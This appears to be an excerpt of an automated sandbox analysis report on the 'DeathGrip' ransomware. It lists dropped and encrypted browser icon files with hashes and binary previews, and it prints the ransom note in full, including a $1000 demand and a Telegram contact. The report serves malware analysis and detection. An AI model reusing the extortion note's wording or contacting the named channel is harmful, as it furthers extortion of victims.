                                                          SSDEEP:192:XlnGcM3dTGmC06DBfLQb3X6u601nKhI1R0aRYMsSFpK47uaGbpKLeelQQ6:1GR3B5C06NT61naix3pK47uaGbYLlS
                                                          MD5:060CDC67E3DCC8077866F17A787AF4E6
                                                          SHA1:3C66EBA0CC198C74121166F3837B1B73093B0510
                                                          SHA-256:88FCBFAB25CB76BDACB571500ADCB9436D387380981BFEBD74A55871D5792322
                                                          SHA-512:DC794FF5CD36A7DED52738E1657BCDA40EDE2ECB176281F5CAB269993AF096AE1FEDD8B17AD845868FA95F9793DB277ED0C5DB394C845E291898F9FAAA523F47
                                                          Malicious:false
                                                          Preview:........?1....X.c..?...f.u\......$.......B.$.:..=.I..a......!.Z:H..(?..'W..U&)....5U..Qx........e.*[..{......6..khn.L........>.(.....J'...._0.c.A[...U.IG........-8U.s.3;0.t..)a..!...[H$b<C....n_EOb..7/[.y..(.m..7.8...pQ}...D.....S...ut.,.W.. E.3Ag..p....=.K.T09....9........'z.k.m...h.....#.[.E.Vn...E..N?...V9.....OL....{.^k..{...C..O1..3&.........s.....["...}...g.j..^..J1....^tu....P..u......t.N...u..=...../..Af./.T.I..bq.{....f..S..w.o..*..rK...6(.f ..c..`..L..jVv=N..$.A.# .M}.Em....."8v...l..u..]E.......S1.....2.....K....K....ms.Od6.dO..:.V....l..b.bH...(.rSE....K.D...,v.U.G.....>Fh.........()...,u2...7`...?I......._`......<.....N..?.{..m.c3OJM...:........3........G...qd..`..\.N#.dNy'-d..b...r."...$c..3..2./.~C....t.+..r?..R.|KG.A.!.<.\.......^y.....+YO......,....od.&T.u.<.m...4.2.9.cN.48...{....(1h.drP..*..P...!1.e....j/......C..K..).f..Jf..UH.K....r.>...z.7...Vk.0M7O(.......9s.K...2Dv.s-O..0H...O3$p-3....bJ.........e.\-.".........

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7312
                                                          Entropy (8bit):7.968168307650323
                                                          Encrypted:false
                                                          SSDEEP:192:NvVozL5xxzuq2uaMZ1xYFxo9KbFU9yRjUVurfm8gJ:DuxR2uhyo9iU8dUVMmVJ
                                                          MD5:74C1EC95C528220DF77B3617A90BBC48
                                                          SHA1:156A110AB02F8A3D232A4FD610197633BE571C80
                                                          SHA-256:4D070370E33248455E9D0BE1F129EFB4A104E7E2580A1E1BF4D5CED32EAB2AF1
                                                          SHA-512:0556BA657825CA8D569DA21BE290EF647E18BA569BEDF4B78D9BEF5225A489CBBED4D5D0385CCDEB4BDA927892D01540FA7DDFCCEE717535AECFD202337C49A7
                                                          Malicious:false
                                                          Preview:........../.*[.p:...)z. .....^..V]e....x...i.G.........K#.T.N:..Lm...^..4f.hy..._...%.SI.....>..,.$..:x...x.m8..... ..^Z>.<..x..O..=........T....AL..$.I..}......-..p. .i...F....f.Ki...d<.............M.Z=.!k.a..+<..M.m.(X.....96.7c...`......U.h..._...2K&8.l!.......6B..b+..........y._.<..*7..$.....,.$.r.bW...m.....XI%.....5..k...u...Gs..!.(.\+.w.B.......v.E.'.q,R.D.&.N.U....7"Er.....".\....q...8K..:.J.j..+..Bu7...SP....[S.~.E._u.H.'+V~.......Q7p..% ...E.../..'Aw.jb..~t...B..@.`P..#.x...&.d.>.h...$CL.#..G_"P .8..=.kl.l....dc-....\.v3.....w^..t...K]...c....(...X.;co....eh....5.....9.."u..l.}.h...Eb.}@.X....xc.ucU..G.*..h.J..2C.Z(8.l..G.%.)...C.R.e.u.Y@.....IMY..w8....."...Q.c.../RT..g........#$....2F...F_.v/I........<.>Q.....bL........|...+...^*.R..a...,.\.3u......EI.?....o..M.~.{.y..U.!g.:..$-l...TAj....I..+..P....r....J..6?.f..U..S..Z.......+.;k.K.l.R..z.w3.Nm;....i]........h$..N.4%F.l.s=.{D..i......?.p..f......NU.\..?.c.6....q.Z..Y."Z..d.. ..bjV

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25696
                                                          Entropy (8bit):7.99119668899421
                                                          Encrypted:true
                                                          SSDEEP:384:SiBN4e5fxmhECCw1BZlviMJYllyyr4iY+DmJj0u4Bqq+uGazVb0IeMkaecH/Yxmj:f5WCwPXqD94i7DmL4B+QaAVe2/6vS
                                                          MD5:13AFE528602BA931975E2DDDF15FC4AD
                                                          SHA1:7BE113B16DE3C68846AB03B043658F6F41A41CB8
                                                          SHA-256:CDEFA42A325A75858FF0D60D375EA9447822D502AD65DBA2F3C18A519525F791
                                                          SHA-512:8D358937103FEDFB114DCC12B9FFEC85D2F216816A45721B88C04DE9E845CE91AD675B9846594362574981B7E58D24135D01FA30545BBE806A456D0259F542E8
                                                          Malicious:true
                                                          Preview:.........._90..u.....L....^..u.7 wu......6.....FD.r.Lx....JZ..f.4'.9.C36Y.c..x....+...R.....9.... ..v..~6......v..e....R.6.*..E.0.._..O...f..p^w.B.....S.1.4$7...Dpm..s..7.L..;....j38..KGw...1&......QR.(.....D./.x..5S..7....7.~....!Q.\..M.R5..*..P.(..K(...2wH|2.........8u...[....2..b.xo....U=f9....W..u.....P.^.j..._.......4.cY.<)~S......7.>...?/..)..&$I..j..(-MS.......0H.sgm. .Ep/4~.......... ...>G..D.7nl...2.3Y}..........1.)<.S.$.o...(C..T...o....k..Jb...)..4...P^.L...........5..).?.._..Z._...n.p.)..8-...S.[.m....iJd...!.m.....I..n.(H.9......{.&...%<y...q/v.........&..S`.L.OM..M..[....).Tf...Ki....y...(,j..n....YF(3..`"..}.....dl.7.W.`lA..C)...O\{e.rg&...n\X.y...!.....F*...B?...s.$......oz.)..S..r..y.$..E........g..H.zd,.6V...r0......!..a..9.'......eK"A..iXV....C.*...{.:....\..p.."....`v?1..|k3.J}^i/vQ....c[....ZX..V....c........v...Z.........&8n..].q3=JY.....=...-z..6!.U..[.......C.+^(.z...p..r.gp..3....l.N.....$.....R.7*n.&..SCBR!"..9.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1856
                                                          Entropy (8bit):7.837763560277669
                                                          Encrypted:false
                                                          SSDEEP:48:DPFCZsqjNeWHhqCmkiOSKwFRnn54YutnJokUckfNSZX:DPF8enFkiO6Hnn5stnOkGOX
                                                          MD5:CE71AFF78CDFAF6F8791D955C3E8941F
                                                          SHA1:B63CCCA05B0DC40F33713C7616B1A7EE72E19244
                                                          SHA-256:DDB34DBABBA3BBD9EC05349D3A137FE63DF196EE5DDB9DFC8B8892C9D5242AE4
                                                          SHA-512:12AF61E4DB6FA392C4667D3514A552B1C9D0DE314BA33180714F2A17F9606CDE7845E5742A5BEF565C69F0E791AADF94933D23D737B6AAA620C8FBA91E115D88
                                                          Malicious:false
                                                          Preview:........z.}.n....u\....5...GH...._O/.<o....r......Q...H#D.k..=.z....7...t.5....P..Z....D.....Y.x~J.(9..(>.%..f8.O..b....ccpt...)K.Z...+2.=..T8.6.. ...}.0...[f3[..C..e..f\<v...L,..a{%.Q.......i..+xP.!L....d.:.g.-r>.......p&.!)}..,.o....p..S..<.k?A..#.......F.3.~...*..f .s....."..1....k..?v.i7!2...k.G.1..;.<.Q.k.....=g.!0Mds....d.7f.....K(.:16...........!./g......:O...>....<....T.z..P..o...=..../...x....E@....o].y.+...).R.I.(....V.g.p..>..d.-..\...]X..-.CX.aL...._...}O..3..~.fM...v9..D$.H..y.......I..0.$..4e....".a...%........E.....W..Fb...k...i.Sw2...Qq...3..Lf.9....\..u?.V!.....r..... ..=.r(.......;A...j.$._x....P._.@.....>r..r.+v...<.<'!...Rt.g..k...I.dK.0..$..\...e...v..=.-....-.i.......w.{.H......u[.k.......=..#.........6"ko..s..J.....yY..uv.....F.....`*T.....R.M....?>..s.......t.6...H.+....`.A..$.P......1#.;0[.y6.5...o......1.p.... 2...=.sQO.X.u......9.h...j..V...?si,.2..L\7f.H..?...n.+.+*.]r..(e.K.....H..m..U..d.....xQ.p".S.m..,!p[...v...D.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2768
                                                          Entropy (8bit):7.908298847564416
                                                          Encrypted:false
                                                          SSDEEP:48:CV8qYxyLWNHXwAaVU07x6gMwYK7iWoflyXa0rTaUHvJxMYF7Pt/4ra0GCCALOQ/h:C+RxXw5kgsK7pofcZR3BFwFDOfk
                                                          MD5:6AB98B2224A571A51DF6230B79AB80AD
                                                          SHA1:F0B77EC834CB405B7E9EB8D44713755D6CA3BD5C
                                                          SHA-256:B0D4C82D1CDC01850B0DFEA19E519791AFC211E77DB9F03A31AF7201B9664407
                                                          SHA-512:B9EC5751C1FE9E2B52B5C2D869C0553BF45826C6E0596734E9178FAEF17CD4CCCE670052332763033F383180955415644616C9EDEB0D5250CE67AF56FA815C21
                                                          Malicious:false
                                                          Preview:........af.9.p.zf.]..dyO..2t......6.i.1q.E...M....q..+`b....P.{p..y#.G.Ri.....a.}.\......nE.4.}.LKA.O...@y..6...&?..J.J..<....KXmT.\.V.b.s.R.7b..S.._G}o}"...X.KcX....1..2.a=.f........M..|.PJ..%.zo.....t5@....xh7...........M.........U.S....i..oU.V.....X.......5.j....xa0B........).$.tpa...9s._!.v....P...|..^m....|........:.fu"...N...H:...9...k....+O.|w...kn.I...;v....z..|=.|.e...N.P....I......."-IkqBz.>..p.Ke....6.M.jj.n<.@."...G).Y}c.)..z9..dG.+..fL.....i8S(^.6...t....l._....Ch.M..sH....5..^a.J.vh.M..4....0.....2....A.n-Ezk..._.85............J(..'.w....-..4......N6..(...:.......1v...t.._Q.........f..D..,O..T......F..:...8..B...$...,Bz....#L.....0.E.n..-7.n.....LC>..N.f.2.....D..v...I.F7.2..Qrh....<..........5.7.....E`..t.T.q..#n6n.._O......Xf#Q2(G.T9.?.N..@;.Zs_...N.r.x...^.V/xz..za.1....@.~.]..........^......T...K...=7.7..,.S....0..I[.q......t..O$H.......;...*...%a.y..........}....p%8.....E)...ww.|...<....i.`y.P....."].H..s.....

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4144
                                                          Entropy (8bit):7.930964293958973
                                                          Encrypted:false
                                                          SSDEEP:96:yUBL16j7UcbpJxXNlKQbOyKSdloeR0qZexHjqK3F/DDF:dKAcbpJxXNlKqOy7boyhAeK39vF
                                                          MD5:86108124BAABC97D30AF568A4F07E491
                                                          SHA1:B6DB48652F08365731DD242DC9707C573E6932C2
                                                          SHA-256:6A3EDD1000F7610C25BF3DCB76F0BCE250C9520E1524DF57CDD241A57E1B26FF
                                                          SHA-512:E990E3F6E6B86F4ED7A0F34CE581FCF5012CA2233D93AAFFB6AA236751624B6F77C19C6C76D6D5422AED85F4A61779FA59CD934492704293A6B972B22F0007CD
                                                          Malicious:false
                                                          Preview:........he{4./?.7........l...o.....5.Jxt...'..1..g._....2...+.g..y......3.e..u......`..4.[...mN.fA..+Vd.6.n..[.H..pf..~P_qDYJ~..^+..........BZ.G.:...?...w..U......j&...z6Qu.<41R.7j:`*..j...Nf`[...~..;*y..gPp.Q.....@.........................(..s.:...F......d&..?.wp./._G..v....O...c...>.D.G.#...d5.90fJC.I5U.,....t....|..R..t}.`.i........=..V....A.js....%.i.,....v.1.J..l.>}.*..p..4...<..66...>.F}.%...$..h...KD../..?...{.1.D[.?...J....W..U>8...z....?j....O.......>.#.s.q>..>{r.V6O.....\....h.h..N.ql.....]r.4/.=#.....i..S....g.m.{.$Y4M.pj.B.*|...u..H........_Z..N...g....v.I:..>.3x..`a...^..%......Nv...O....{F.2h];..@......qv...../SKu.?+.0....8.i)L..fk.f.c.\L.;.a...e.5.2.P.U&.5.LX...A..............'S......{q..V..hy.G....*.%..g.v...O.6t`.~5f&.Aw..y.k.a.....PN...J.Uc.....|.h.O....}.<Z.>X..aWG..IO)Q..D..]..b.^:Q.k.QU..>.G'Z...cf......W..t...8.&..O.EN.+...Y...P:....~....0..|l...W...<eC..%..|W..j.U.._..f.i..t....H....$c.J.oT.ILg..G"E._.}.....Ue...=rg.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7072
                                                          Entropy (8bit):7.967985126680914
                                                          Encrypted:false
                                                          SSDEEP:96:yJ5aji5RlVY7LnkG08kM0EqviRTHU3qK5GoiD2NwpNb0ZC3kLcZuUoeQoSRUJ4hy:I6MEHkV8kjEVT63Bwpp3NZuVenSRUP
                                                          MD5:7B1483C645EE12A3B8604B71F3BF72DA
                                                          SHA1:E7CFAD93AAD7BF1A9A1C3FECA821AEA51D489BE9
                                                          SHA-256:C9A994BECC898F8919D997082CD5861F09CD43FE2E2BF789C93D9923F48E2B0A
                                                          SHA-512:C2A69EDAAB55FA1D966EE79A1B27C7BFFEEE51020188565F3ED1DBA268DD4E75C411069AE31EAFCA62BCE4698E6CB844751E43DDDA8446C0248EE0D847121C58
                                                          Malicious:false
                                                          Preview:.........5Z;.BM.....|.l\.....i.6...$"..>U.-H.]...*..X.1t.o........16)...J....U[.......;.%.cfQ.....e&..q..'D..m......j.EI I..G.8.c....xQD.m.y.VQ..v......1...8...e+..A.Y...1...=.....RXh.......+wc.|..O.A._.YyxR.|4.?..e...h..+....'.f..*.....;).j.....W.LB.......Wv...'@F...{....f....D....}O&...^.MKU..F.:j.....%..Z......5.t...i...K.........s.K......c..S..h......`..oi!..D.S.."b..o....Yl.@o...)..M...n9.....=....y.x.....t.emD..Dvg.)....<N|}..... .u.....,x.U.....^../.(.m.z..0T&......_`......$.4K..\z!..$...u....w.1.....d.Th.|....-(....AE.\..%k ..M.S.i.......Z.....,.*..8..|.b{..J...>F+...=....6......R....*E.0'7aE...Fq.*G.E.*.....?M.2A.yU.......=l$.6...E.:...-.*..#R.....e..*.O.w.{(.e....L.......T..$\).r`5...S...W............).SK!..?Z..'>.5..d.........T|i...`.......i..z..Rn.c.6~A....|HP.(.......S..(4.O.d4..%...P<r.h..ra.>..(.<c...XD.3!|.0...Op..<.E.PSL.5..Y2..-..r.8...z.D..I.:CE.4....6 ..zJ......H....H<.7;..}..|.i...H.qZ....e!{.}.S58..`.i....5.f.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2672
                                                          Entropy (8bit):7.901757161387217
                                                          Encrypted:false
                                                          SSDEEP:48:BIItdOgNpntojXBEvTTzW/Ae4cwkn+eO/M1iy8LCwA4BfKTmSB0xEB8f:aGk0y4W/AJzk+eO/M1iyyCiBSTj0xEBc
                                                          MD5:FDBED7AD9BA18C57314485EBF7646D33
                                                          SHA1:D8A72D403D76DF07E9D94768E106D56C84688548
                                                          SHA-256:69B7BDB7916F9FF0FD7FFAB046EE9C18B7DAA23BF581F878EE51BB34FAEC1CA5
                                                          SHA-512:F0F62C3B26DAD4EB18E3345276BBCAFD52BF14CA54CC50862AF15D2F7DF6BD83C6AAB7A8F3418386AECDD583E9FEFE8E57091320403FFA82E9B62981B389B8BB
                                                          Malicious:false
                                                          Preview:........Z...t;...C...m.H.zKK..=5[.>..x..p..@...w..@L.!. V0...q.. .rC.[..0FRA/....qS`.....*.{.....&.....5/...Rq.E....1.C..7..zx~...j..`.?..2..+.R.........R.7.*.rR.G:?....[...y...J.:B...1.\.'L......_..D.6PJ...{..yM.fE.....*....Y.Z}..V.QW.7.....U..|..kq..XE.Pl.lO.8....IM.S..q..c.=..~.4........K#K.*...Q..{.}#.W..c$..!.......'..H..[......*..K.m..d.2.. G..........a.....-;....s.b....8..;....a.i...\q..^...p.'.......8.YWY>~=%{....<...jw...-...d.s.J.gT..V.!.k.0...m./...e..>K....62..;E.#...?...5+_g..w...S....i...K\R.......5.?.....I'~r_].......~.....{v^..1.Y.H..........Q}..(..yAV.d..-.....9............dgJ....W.*~.G..p .b.....8...).1.-..L y.g...[[..k..F..z.@yZV.B@L\.6.h....u..*.F?......7........!.)..o|>...aI.,".X..zg..i#G|k9.b.@=.:d...s.SK..f~.._(...f....J...7/... d..)....A.o.}.."8.I.|..&...t...-.(3..D.-..;G.5.(.M...2R.O.5ZRM..`.P..E;1.....?0..!G.Y..f_..U#.5_.u.I5J..X.:.Mh.>...0^.....)....].>0*f..t.8.a.X)...7v,....v.^.........5..cK.2....9...U0...+...o...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1648
                                                          Entropy (8bit):7.785286843779543
                                                          Encrypted:false
                                                          SSDEEP:24:8CQGVp8O+wQafipjFZ59mu02YHBPglD3IMIp9kHwhcHguWjPY9kjCHoHDGhWR:/QTwQafiTv9m52QB4lmkQhn3tjzKYR
                                                          MD5:39001B0B88661A3627CA90471A8767F5
                                                          SHA1:7EAC61E621FFF73D7A55B86134564F4FC4391788
                                                          SHA-256:97802E36D36A7044C716DB3BC8E920A2D8B5732BB318C0DFECEF2CD0B9BA5788
                                                          SHA-512:698FAD57FCD7D5A656CA44FC5E5DB0CE19F03BD64B12296825347A74BE1486242E00E0D87F1CF46525246ECEE67824B8A954DFAF1F10F9BC7568B7B26EDCEC91
                                                          Malicious:false
                                                          Preview:...........j'DW...x..ME&. .k..P>...1.....|2...f.i....u....7....ZJ-....Hr..$.&.5+..|..p.^c!4...f.E....e.3.(2.;+%k.S(.r......+K......."..lxB.u.dn..IM....S.S.3.x.Zl......I.i..^........p._w9:..]..=..3....C.....w...Q..yf...|._..e....1...0..lc..........J....N.#r%c..i_.E.x.J.0..Y.m..<%x..g...u.*..r@.4I...2A.qm.g.HJV....q....R.....4...(itdS3%.......(.s9..pa.......w..f.....:.:Y....I../D........zI..k.R<.qmp.,o..w.Q..s........7.&l&.q....]^.;WiT.!M..(h..E.C.f..V..G.T..*..P...o)9......d..5...t.(.........H.E.+.|u...{N34...k.Jk.....e}..B.-.c..&c7....(..y8J'{..m....I..&?..X..Q...........+j...Q.d..(S...5...2.-.....-.#....[J..-...V#...4......'..f;.mg.J.....\./..$......oB.8..X..../i..a..}..*>./G*.3.U......@.b.M...../F...d......)f{.EwR..,=F...g.:>y.i....00......:4O....g.O.....;.2`..O.`.b...l ..B..3..K......B.#p..'.Zwc....[j........MU-...........X3..../;BH...IiF..*w.E.m'pD..........>.z.Kw."h@......r.E..j.......V.....Rp.0..V.OB.m.z*...]nZP<.Y..@vJ'.....N

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\main.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\main.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
